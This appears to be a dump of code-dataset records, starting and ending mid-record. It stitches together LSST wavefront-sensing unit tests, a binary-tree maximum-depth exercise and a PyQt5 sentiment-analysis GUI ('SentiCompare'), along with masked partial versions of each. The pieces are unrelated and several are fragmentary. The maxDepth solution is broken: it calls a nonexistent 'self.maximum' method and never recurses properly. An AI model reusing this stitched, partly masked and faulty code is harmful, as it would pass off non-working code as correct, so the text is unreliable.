self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n sensorNameList = ['R22_S11', 'R22_S12']\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n repackagedDir = os.path.join(getModulePath(), 'tests', 'testData',\n 'comcamRepackagedData')\n skyFilePath = os.path.join(repackagedDir, 'skyComCamInfo.txt')\n self.wepCmpt.setSkyFile(skyFilePath)\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, 'intra')\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, 'extra')\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import os\nimport shutil\nimport numpy as np\nimport unittest\n\nfrom lsst.ts.wep.Utility import FilterType, runProgram\nfrom lsst.ts.wep.WepController import WepController\nfrom lsst.ts.wep.ctrlIntf.RawExpData import RawExpData\n\nfrom lsst.ts.aoclcSim.Utility import getModulePath\nfrom lsst.ts.aoclcSim.WepCmpt import WepCmpt\n\n\nclass TestWepCmpt(unittest.TestCase):\n \"\"\" Test the WepCmpt class.\"\"\"\n\n def setUp(self):\n\n self.outputDir = os.path.join(getModulePath(), \"tests\", \"tmp\")\n self._makeDir(self.outputDir)\n\n isrDirName = \"input\"\n isrDir = os.path.join(self.outputDir, isrDirName)\n self._makeDir(isrDir)\n\n self.wepCmpt = WepCmpt(isrDir)\n\n # Set the survey paramters\n self.wepCmpt.setFilter(FilterType.REF)\n self.wepCmpt.setBoresight(0.0, 0.0)\n self.wepCmpt.setRotAng(0.0)\n\n def _makeDir(self, newDir):\n\n os.makedirs(newDir, exist_ok=True)\n\n def tearDown(self):\n\n self.wepCmpt.disconnect()\n shutil.rmtree(self.outputDir)\n\n def testGetWepController(self):\n\n wepCntlr = self.wepCmpt.getWepController()\n self.assertTrue(isinstance(wepCntlr, WepController))\n\n def testGetFilter(self):\n\n filterType = self.wepCmpt.getFilter()\n self.assertEqual(filterType, FilterType.REF)\n\n def testSetFilter(self):\n\n filterType = FilterType.R\n self.wepCmpt.setFilter(filterType)\n\n self.assertEqual(self.wepCmpt.getFilter(), filterType)\n\n def testGetBoresight(self):\n\n raInDeg, decInDeg = self.wepCmpt.getBoresight()\n self.assertEqual(raInDeg, 0.0)\n self.assertEqual(decInDeg, 0.0)\n\n def testSetBoresight(self):\n\n raInDeg = 10.0\n decInDeg = 20.0\n self.wepCmpt.setBoresight(raInDeg, decInDeg)\n\n raInDegInWepCmpt, decInDegInWepCmpt = self.wepCmpt.getBoresight()\n self.assertEqual(raInDegInWepCmpt, raInDeg)\n self.assertEqual(decInDegInWepCmpt, decInDeg)\n\n def testGetRotAng(self):\n\n rotAngInDeg = self.wepCmpt.getRotAng()\n self.assertEqual(rotAngInDeg, 0.0)\n\n def testSetRotAng(self):\n\n rotAngInDeg = 10.0\n self.wepCmpt.setRotAng(rotAngInDeg)\n\n self.assertEqual(self.wepCmpt.getRotAng(), rotAngInDeg)\n\n def testIngestCalibs(self):\n\n sensorNameList = [\"R22_S11\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 6)\n\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n numOfFile = self._getNumOfFileInFolder(fakeFlatDir)\n self.assertEqual(numOfFile, 0)\n\n def _makeCalibs(self, outputDir, sensorNameList):\n\n fakeFlatDirName = \"fake_flats\"\n fakeFlatDir = os.path.join(self.outputDir, fakeFlatDirName)\n self._makeDir(fakeFlatDir)\n\n detector = \" \".join(sensorNameList)\n self._genFakeFlat(fakeFlatDir, detector)\n\n return fakeFlatDir\n\n def _genFakeFlat(self, fakeFlatDir, detector):\n\n currWorkDir = os.getcwd()\n\n os.chdir(fakeFlatDir)\n self._makeFakeFlat(detector)\n os.chdir(currWorkDir)\n\n def _makeFakeFlat(self, detector):\n\n command = \"makeGainImages.py\"\n argstring = \"--detector_list %s\" % detector\n runProgram(command, argstring=argstring)\n\n def _getNumOfFileInFolder(self, folder):\n\n return len([name for name in os.listdir(folder) \n if os.path.isfile(os.path.join(folder, name))])\n\n def testGetSkyFile(self):\n\n skyFile = self.wepCmpt.getSkyFile()\n self.assertEqual(skyFile, \"\")\n\n def testSetSkyFile(self):\n\n skyFile = \"testSetSkyFile\"\n self.wepCmpt.setSkyFile(skyFile)\n\n self.assertEqual(self.wepCmpt.getSkyFile(), skyFile)\n\n def testCalculateWavefrontErrorsComCam(self):\n\n # Make the calibration products and do the ingestion\n sensorNameList = [\"R22_S11\", \"R22_S12\"]\n fakeFlatDir = self._makeCalibs(self.outputDir, sensorNameList)\n self.wepCmpt.ingestCalibs(fakeFlatDir)\n\n # Set the skyFile\n repackagedDir = os.path.join(getModulePath(), \"tests\", \"testData\",\n \"comcamRepackagedData\")\n skyFilePath = os.path.join(repackagedDir, \"skyComCamInfo.txt\")\n self.wepCmpt.setSkyFile(skyFilePath)\n\n # Collect the wavefront data\n intraRawExpData = RawExpData()\n intraObsId = 9006002\n intraRawExpDir = os.path.join(repackagedDir, \"intra\")\n intraRawExpData.append(intraObsId, 0, intraRawExpDir)\n\n extraRawExpData = RawExpData()\n extraObsId = 9006001\n extraRawExpDir = os.path.join(repackagedDir, \"extra\")\n extraRawExpData.append(extraObsId, 0, extraRawExpDir)\n\n # Calculate the wavefront error\n wfErrMap = self.wepCmpt.calculateWavefrontErrorsComCam(intraRawExpData,\n extraRawExpData)\n\n self.assertEqual(len(wfErrMap), 2)\n for wfErr in wfErrMap.values():\n self.assertEqual(wfErr.argmax(), 1)\n\n\nif __name__ == \"__main__\":\n\n # Run the unit test\n unittest.main()\n",
"step-ids": [
9,
14,
16,
22,
23
]
}
|
[
9,
14,
16,
22,
23
] |
# coding=utf-8
"""
Given a binary tree, find its maximum depth.
The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
Example
Given a binary tree as follow:
1
/ \
2 3
/ \
4 5
The maximum depth is 3.
"""
"""
Definition of TreeNode:
"""
class TreeNode:
def __init__(self, val):
self.val = val
self.left, self.right = None, None
class Solution:
"""
@param root: The root of binary tree.
@return: An integer
"""
def maxDepth(self, root):
# write your code here
if not root:
return 0
return max(self.maximum(root.left),self.maximum(root.right))+1
|
normal
|
{
"blob_id": "262d6722f4c158d0a41b22433792cdc35651d156",
"index": 9459,
"step-1": "<mask token>\n\n\nclass Solution:\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-3": "<mask token>\n\n\nclass TreeNode:\n <mask token>\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-4": "<mask token>\n\n\nclass TreeNode:\n\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n\n def maxDepth(self, root):\n if not root:\n return 0\n return max(self.maximum(root.left), self.maximum(root.right)) + 1\n",
"step-5": "# coding=utf-8\n\n\"\"\"\nGiven a binary tree, find its maximum depth.\nThe maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.\n\nExample\nGiven a binary tree as follow:\n\n 1\n / \\ \n2 3\n / \\\n 4 5\nThe maximum depth is 3.\n\n\"\"\"\n\n\"\"\"\nDefinition of TreeNode:\n\"\"\"\nclass TreeNode:\n def __init__(self, val):\n self.val = val\n self.left, self.right = None, None\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\" \n def maxDepth(self, root):\n # write your code here\n if not root:\n \treturn 0\n return max(self.maximum(root.left),self.maximum(root.right))+1",
"step-ids": [
1,
3,
4,
5,
6
]
}
|
[
1,
3,
4,
5,
6
] |
# ================================================== #
# MAIN WINDOW #
# ================================================== #
# Author: Brady Hammond #
# Created: 11/21/2017 #
# Last Edited: N/A #
# Last Edited By: N/A #
# ================================================== #
# FILE SETUP #
# ================================================== #
# Import statements
import os
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtGui import QStandardItem, QStandardItemModel
from PyQt5.QtWidgets import QMessageBox
from src import FileDialog, SentimentAnalyzer
# ================================================== #
# CLASS DEFINITION #
# ================================================== #
# UIMainWindow class definition
class UIMainWindow(object):
# Define __init__ function
def __init__(self):
# Create main window
font = QtGui.QFont()
font.setFamily("Myriad Pro")
font.setPointSize(14)
self.main_window = QtWidgets.QWidget()
self.main_window.setFont(font)
self.main_window.setObjectName("main_window")
self.main_window.setWindowModality(QtCore.Qt.WindowModal)
self.main_window.resize(450, 460)
size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
size_policy.setHorizontalStretch(0)
size_policy.setVerticalStretch(0)
size_policy.setHeightForWidth(self.main_window.sizePolicy().hasHeightForWidth())
self.main_window.setSizePolicy(size_policy)
self.main_window.setMinimumSize(QtCore.QSize(450, 460))
self.main_window.setMaximumSize(QtCore.QSize(450, 460))
self.main_window.setBaseSize(QtCore.QSize(450, 460))
# Create branding icon
self.branding_icon = QtWidgets.QLabel(self.main_window)
self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))
self.branding_icon.setText("")
self.branding_icon.setPixmap(QtGui.QPixmap("../images/senticompare_logo.png"))
self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.AlignVCenter)
self.branding_icon.setObjectName("branding_icon")
# Create branding label
self.branding_label = QtWidgets.QLabel(self.main_window)
self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
self.branding_label.setPalette(palette)
font = QtGui.QFont()
font.setFamily("Optima")
font.setPointSize(50)
self.branding_label.setFont(font)
self.branding_label.setObjectName("branding_label")
# Create first horizontal layout
self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)
self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, 430, 50))
self.horizontal_layout_widget_1.setObjectName("horizontal_layout_widget_1")
self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_1)
self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)
self.horizontal_layout_1.setObjectName("horizontal_layout_1")
# Create run button
self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)
self.run_button.setObjectName("run_button")
self.run_button.clicked.connect(self.run)
# Add run button to first horizontal layout
self.horizontal_layout_1.addWidget(self.run_button)
# Create quit button
self.quit_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1)
self.quit_button.setObjectName("quit_button")
self.quit_button.clicked.connect(self.main_window.close)
# Add quit button to first horizontal layout
self.horizontal_layout_1.addWidget(self.quit_button)
# Create file selection tab
self.select_files_tab = QtWidgets.QWidget()
self.select_files_tab.setObjectName("select_files_tab")
# Create second horizontal layout
self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.select_files_tab)
self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, 230, 50))
self.horizontal_layout_widget_2.setObjectName("horizontal_layout_widget_2")
self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.horizontal_layout_widget_2)
self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)
self.horizontal_layout_2.setObjectName("horizontal_layout_2")
# Create input/output tab window
font.setFamily("Myriad Pro")
font.setPointSize(12)
self.input_output_box = QtWidgets.QTabWidget(self.main_window)
self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))
self.input_output_box.setFont(font)
self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)
self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)
self.input_output_box.setTabsClosable(False)
self.input_output_box.setObjectName("input_output_box")
# Create file view
self.file_view = QtWidgets.QListView(self.select_files_tab)
self.file_view.setGeometry(QtCore.QRect(10, 10, 235, 210))
self.file_view.setObjectName("file_view")
# Create file view model
self.file_view_model = QStandardItemModel(self.file_view)
# Add file view model to file view
self.file_view.setModel(self.file_view_model)
# Show file view
self.file_view.show()
# Add file selection tab to input/output tab window
self.input_output_box.addTab(self.select_files_tab, "")
# Create add button
self.add_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)
self.add_button.setFont(font)
self.add_button.setObjectName("add_button")
self.add_button.clicked.connect(self.selectFiles)
# Add add button to second horizontal layout
self.horizontal_layout_2.addWidget(self.add_button)
# Create delete button
self.delete_button = QtWidgets.QPushButton(self.horizontal_layout_widget_2)
self.delete_button.setFont(font)
self.delete_button.setObjectName("delete_button")
self.delete_button.clicked.connect(self.removeFiles)
# Add delete button to second horizontal layout
self.horizontal_layout_2.addWidget(self.delete_button)
# Create manual input tab
self.manual_input_tab = QtWidgets.QWidget()
self.manual_input_tab.setObjectName("manual_input_tab")
# Create text input
self.text_input = QtWidgets.QTextEdit(self.manual_input_tab)
self.text_input.setGeometry(QtCore.QRect(10, 10, 235, 250))
self.text_input.setObjectName("text_input")
# Add text input to manual input tab
self.input_output_box.addTab(self.manual_input_tab, "")
# Create results tab
self.results_tab = QtWidgets.QWidget()
self.results_tab.setObjectName("results_tab")
# Create results scroll box
self.results_scroll_box = QtWidgets.QScrollArea(self.results_tab)
self.results_scroll_box.setGeometry(QtCore.QRect(10, 10, 235, 250))
self.results_scroll_box.setWidgetResizable(True)
self.results_scroll_box.setObjectName("results_scroll_box")
# Create results content
self.results_content = QtWidgets.QWidget()
self.results_content.setGeometry(QtCore.QRect(0, 0, 230, 250))
self.results_content.setObjectName("results_content")
self.results_scroll_box.setWidget(self.results_content)
# Create results content text
self.results_content_text = QtWidgets.QTextEdit(self.results_content)
self.results_content_text.setGeometry(QtCore.QRect(-1, -1, 235, 250))
self.results_content_text.setReadOnly(True)
self.results_content_text.setObjectName("results_content_text")
# Add results tab to input/output tab window
self.input_output_box.addTab(self.results_tab, "")
# Disable results tab
self.input_output_box.setTabEnabled(2, False)
# Create first group box
font.setPointSize(14)
self.group_box_1 = QtWidgets.QGroupBox(self.main_window)
self.group_box_1.setGeometry(QtCore.QRect(280, 110, 160, 140))
self.group_box_1.setFont(font)
self.group_box_1.setTitle("")
self.group_box_1.setAlignment(QtCore.Qt.AlignCenter)
self.group_box_1.setFlat(False)
self.group_box_1.setCheckable(False)
self.group_box_1.setObjectName("group_box_1")
# Create first vertical layout
self.vertical_layout_widget_1 = QtWidgets.QWidget(self.group_box_1)
self.vertical_layout_widget_1.setGeometry(QtCore.QRect(9, 0, 141, 141))
self.vertical_layout_widget_1.setObjectName("vertical_layout_widget_1")
self.vertical_layout_1 = QtWidgets.QVBoxLayout(self.vertical_layout_widget_1)
self.vertical_layout_1.setContentsMargins(0, 0, 0, 0)
self.vertical_layout_1.setObjectName("vertical_layout_1")
# Create pronoun checkbox
self.pronoun_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.pronoun_checkbox.setFont(font)
self.pronoun_checkbox.setObjectName("pronoun_checkbox")
# Add pronoun checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.pronoun_checkbox)
# Create lexical checkbox
self.lexical_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.lexical_checkbox.setFont(font)
self.lexical_checkbox.setObjectName("lexical_checkbox")
# Add lexical checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.lexical_checkbox)
# Create rule based checkbox
self.rule_based_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.rule_based_checkbox.setFont(font)
self.rule_based_checkbox.setObjectName("rule_based_checkbox")
# Add rule_based checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.rule_based_checkbox)
# Create machine learning checkbox
self.machine_learning_checkbox = QtWidgets.QCheckBox(self.vertical_layout_widget_1)
self.machine_learning_checkbox.setFont(font)
self.machine_learning_checkbox.setObjectName("machine_learning_checkbox")
# Add machine learning checkbox to first vertical layout
self.vertical_layout_1.addWidget(self.machine_learning_checkbox)
# Create help scroll box
self.help_scroll_box = QtWidgets.QScrollArea(self.main_window)
self.help_scroll_box.setGeometry(QtCore.QRect(280, 260, 160, 140))
self.help_scroll_box.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.help_scroll_box.setFrameShadow(QtWidgets.QFrame.Sunken)
self.help_scroll_box.setWidgetResizable(True)
self.help_scroll_box.setObjectName("help_scroll_box")
# Create help content
self.help_content = QtWidgets.QWidget()
self.help_content.setGeometry(QtCore.QRect(0, 0, 158, 138))
self.help_content.setObjectName("help_content")
self.help_scroll_box.setWidget(self.help_content)
# Create selected files variable
self.selected_files = {}
# Set current tab
self.input_output_box.setCurrentIndex(0)
# Retranslate UI
self.retranslateUI()
# Connect UI slots
QtCore.QMetaObject.connectSlotsByName(self.main_window)
# ============================================== #
# Define retranslateUI function
def retranslateUI(self):
# Add text to ui elements
_translate = QtCore.QCoreApplication.translate
self.main_window.setWindowTitle(_translate("main_window", "SentiCompare"))
self.add_button.setText(_translate("main_window", "Add"))
self.delete_button.setText(_translate("main_window", "Delete"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.select_files_tab),
_translate("main_window", "Select Files"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.manual_input_tab),
_translate("main_window", "Manual Input"))
self.input_output_box.setTabText(self.input_output_box.indexOf(self.results_tab),
_translate("main_window", "Results"))
self.run_button.setText(_translate("main_window", "Run"))
self.quit_button.setText(_translate("main_window", "Quit"))
self.pronoun_checkbox.setText(_translate("main_window", "Pronoun Usage"))
self.lexical_checkbox.setText(_translate("main_window", "Lexical"))
self.rule_based_checkbox.setText(_translate("main_window", "Rule Based"))
self.machine_learning_checkbox.setText(_translate("main_window", "Machine Learning"))
self.branding_label.setText(_translate("main_window", "SentiCompare"))
# ============================================== #
# Define showWindow function
def showWindow(self):
self.main_window.show()
# ============================================== #
# Define selectFiles function
def selectFiles(self):
# Create file dialog
file_dialog = FileDialog(self.main_window)
file_dialog.setFilters(["Text files (*.txt)"])
file_dialog.setDefaultFilterIndex = 0
file_dialog.setDefaultDirectory(os.path.expanduser('~'))
file_dialog.exec()
# Return if nothing was selected
if file_dialog.getPath() == '':
return
# Add files from selected directory to file list
elif file_dialog.getFilename()[2] == '':
for file in os.listdir(file_dialog.getPath()):
if file.endswith('.txt') and not file.startswith('.'):
file_path = os.path.join(file_dialog.getPath(), file)
if file_path not in self.selected_files:
self.selected_files[file] = file_path
item = QStandardItem(file)
item.setCheckable(True)
self.file_view_model.appendRow(item)
# Add selected file to list
else:
if file_dialog.getPath() not in self.selected_files:
self.selected_files[file_dialog.getFilename()[1]] = file_dialog.getPath()
item = QStandardItem(file_dialog.getFilename()[1])
item.setCheckable(True)
self.file_view_model.appendRow(item)
# ============================================== #
# Define removeFiles function
def removeFiles(self):
# Remove all checked files
for i in range(self.file_view_model.rowCount() - 1, -1, -1):
if self.file_view_model.item(i).checkState():
filename = self.file_view_model.item(i).text()
del self.selected_files[filename]
self.file_view_model.removeRow(i)
# ============================================== #
# Define run function
def run(self):
# Check if an analysis method is selected
if not (self.pronoun_checkbox.isChecked() or self.lexical_checkbox.isChecked() or
self.rule_based_checkbox.isChecked() or self.machine_learning_checkbox.isChecked()):
# Create and show an error message
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Missing Parameters")
message_box.setText("You haven't selected any methods of sentiment analysis. Please select at least one " +
"method from the list of options.")
message_box.exec_()
return
# Check if the current tab is valid
if self.input_output_box.currentIndex() == 2:
# Create and show error message
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Select Input")
message_box.setText("You must be on the \"Select Files\" page or the \"Manual Input\" page to run " +
"an analysis. Please select one of those pages and try again.")
message_box.exec_()
return
else:
progress_bar = QtWidgets.QProgressDialog("Running Sentiment Analysis...", "Cancel", 0, 100, self.main_window)
progress_bar.setValue(0)
progress_bar.setCancelButton(None)
progress_bar.setWindowModality(QtCore.Qt.WindowModal)
progress_bar.resize(400, 50)
progress_bar.show()
# Analyze selected files
if self.input_output_box.currentIndex() == 0:
sentiment_analyzer = SentimentAnalyzer(self.selected_files, progress_bar, pronoun=self.pronoun_checkbox.isChecked(),
lexical=self.lexical_checkbox.isChecked(),
rule_based=self.rule_based_checkbox.isChecked(),
machine_learning=self.machine_learning_checkbox.isChecked())
# Analyze manual input
else:
sentiment_analyzer = SentimentAnalyzer(self.text_input.toPlainText(), progress_bar, pronoun=self.pronoun_checkbox.isChecked(),
lexical=self.lexical_checkbox.isChecked(),
rule_based=self.rule_based_checkbox.isChecked(),
machine_learning=self.machine_learning_checkbox.isChecked())
results = sentiment_analyzer.runAnalyses()
progress_bar.close()
if results:
self.results_content_text.setText(results)
self.input_output_box.setTabEnabled(2, True)
self.input_output_box.setCurrentIndex(2)
else:
message_box = QMessageBox()
message_box.setIcon(QMessageBox.Warning)
message_box.setWindowTitle("Missing Input")
message_box.setText("You haven't added any input to analyze. Please select one or more files or " +
"input some data manually.")
message_box.exec_()
return
# ================================================== #
# EOF #
# ================================================== #
|
normal
|
{
"blob_id": "a555226b14223dca688d10b811eb36fb229360ce",
"index": 2457,
"step-1": "<mask token>\n\n\nclass UIMainWindow(object):\n <mask token>\n\n def retranslateUI(self):\n _translate = QtCore.QCoreApplication.translate\n self.main_window.setWindowTitle(_translate('main_window',\n 'SentiCompare'))\n self.add_button.setText(_translate('main_window', 'Add'))\n self.delete_button.setText(_translate('main_window', 'Delete'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .select_files_tab), _translate('main_window', 'Select Files'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .manual_input_tab), _translate('main_window', 'Manual Input'))\n self.input_output_box.setTabText(self.input_output_box.indexOf(self\n .results_tab), _translate('main_window', 'Results'))\n self.run_button.setText(_translate('main_window', 'Run'))\n self.quit_button.setText(_translate('main_window', 'Quit'))\n self.pronoun_checkbox.setText(_translate('main_window',\n 'Pronoun Usage'))\n self.lexical_checkbox.setText(_translate('main_window', 'Lexical'))\n self.rule_based_checkbox.setText(_translate('main_window',\n 'Rule Based'))\n self.machine_learning_checkbox.setText(_translate('main_window',\n 'Machine Learning'))\n self.branding_label.setText(_translate('main_window', 'SentiCompare'))\n\n def showWindow(self):\n self.main_window.show()\n\n def selectFiles(self):\n file_dialog = FileDialog(self.main_window)\n file_dialog.setFilters(['Text files (*.txt)'])\n file_dialog.setDefaultFilterIndex = 0\n file_dialog.setDefaultDirectory(os.path.expanduser('~'))\n file_dialog.exec()\n if file_dialog.getPath() == '':\n return\n elif file_dialog.getFilename()[2] == '':\n for file in os.listdir(file_dialog.getPath()):\n if file.endswith('.txt') and not file.startswith('.'):\n file_path = os.path.join(file_dialog.getPath(), file)\n if file_path not in self.selected_files:\n self.selected_files[file] = file_path\n item = QStandardItem(file)\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n elif file_dialog.getPath() not in self.selected_files:\n self.selected_files[file_dialog.getFilename()[1]\n ] = file_dialog.getPath()\n item = QStandardItem(file_dialog.getFilename()[1])\n item.setCheckable(True)\n self.file_view_model.appendRow(item)\n <mask token>\n <mask token>\n",
"step-2": "<mask token>\n\n\nclass UIMainWindow(object):\n\n def __init__(self):\n font = QtGui.QFont()\n font.setFamily('Myriad Pro')\n font.setPointSize(14)\n self.main_window = QtWidgets.QWidget()\n self.main_window.setFont(font)\n self.main_window.setObjectName('main_window')\n self.main_window.setWindowModality(QtCore.Qt.WindowModal)\n self.main_window.resize(450, 460)\n size_policy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed,\n QtWidgets.QSizePolicy.Fixed)\n size_policy.setHorizontalStretch(0)\n size_policy.setVerticalStretch(0)\n size_policy.setHeightForWidth(self.main_window.sizePolicy().\n hasHeightForWidth())\n self.main_window.setSizePolicy(size_policy)\n self.main_window.setMinimumSize(QtCore.QSize(450, 460))\n self.main_window.setMaximumSize(QtCore.QSize(450, 460))\n self.main_window.setBaseSize(QtCore.QSize(450, 460))\n self.branding_icon = QtWidgets.QLabel(self.main_window)\n self.branding_icon.setGeometry(QtCore.QRect(20, 5, 90, 90))\n self.branding_icon.setText('')\n self.branding_icon.setPixmap(QtGui.QPixmap(\n '../images/senticompare_logo.png'))\n self.branding_icon.setAlignment(QtCore.Qt.AlignJustify | QtCore.Qt.\n AlignVCenter)\n self.branding_icon.setObjectName('branding_icon')\n self.branding_label = QtWidgets.QLabel(self.main_window)\n self.branding_label.setGeometry(QtCore.QRect(110, 5, 330, 90))\n palette = QtGui.QPalette()\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(81, 108, 146))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(0, 0, 0))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText,\n brush)\n brush = QtGui.QBrush(QtGui.QColor(127, 127, 127))\n brush.setStyle(QtCore.Qt.SolidPattern)\n palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)\n self.branding_label.setPalette(palette)\n font = QtGui.QFont()\n font.setFamily('Optima')\n font.setPointSize(50)\n self.branding_label.setFont(font)\n self.branding_label.setObjectName('branding_label')\n self.horizontal_layout_widget_1 = QtWidgets.QWidget(self.main_window)\n self.horizontal_layout_widget_1.setGeometry(QtCore.QRect(10, 410, \n 430, 50))\n self.horizontal_layout_widget_1.setObjectName(\n 'horizontal_layout_widget_1')\n self.horizontal_layout_1 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_1)\n self.horizontal_layout_1.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_1.setObjectName('horizontal_layout_1')\n self.run_button = QtWidgets.QPushButton(self.horizontal_layout_widget_1\n )\n self.run_button.setObjectName('run_button')\n self.run_button.clicked.connect(self.run)\n self.horizontal_layout_1.addWidget(self.run_button)\n self.quit_button = QtWidgets.QPushButton(self.\n horizontal_layout_widget_1)\n self.quit_button.setObjectName('quit_button')\n self.quit_button.clicked.connect(self.main_window.close)\n self.horizontal_layout_1.addWidget(self.quit_button)\n self.select_files_tab = QtWidgets.QWidget()\n self.select_files_tab.setObjectName('select_files_tab')\n self.horizontal_layout_widget_2 = QtWidgets.QWidget(self.\n select_files_tab)\n self.horizontal_layout_widget_2.setGeometry(QtCore.QRect(10, 230, \n 230, 50))\n self.horizontal_layout_widget_2.setObjectName(\n 'horizontal_layout_widget_2')\n self.horizontal_layout_2 = QtWidgets.QHBoxLayout(self.\n horizontal_layout_widget_2)\n self.horizontal_layout_2.setContentsMargins(0, 0, 0, 0)\n self.horizontal_layout_2.setObjectName('horizontal_layout_2')\n font.setFamily('Myriad Pro')\n font.setPointSize(12)\n self.input_output_box = QtWidgets.QTabWidget(self.main_window)\n self.input_output_box.setGeometry(QtCore.QRect(10, 100, 260, 300))\n self.input_output_box.setFont(font)\n self.input_output_box.setCursor(QtGui.QCursor(QtCore.Qt.\n PointingHandCursor))\n self.input_output_box.setTabPosition(QtWidgets.QTabWidget.North)\n self.input_output_box.setTabShape(QtWidgets.QTabWidget.Rounded)\n 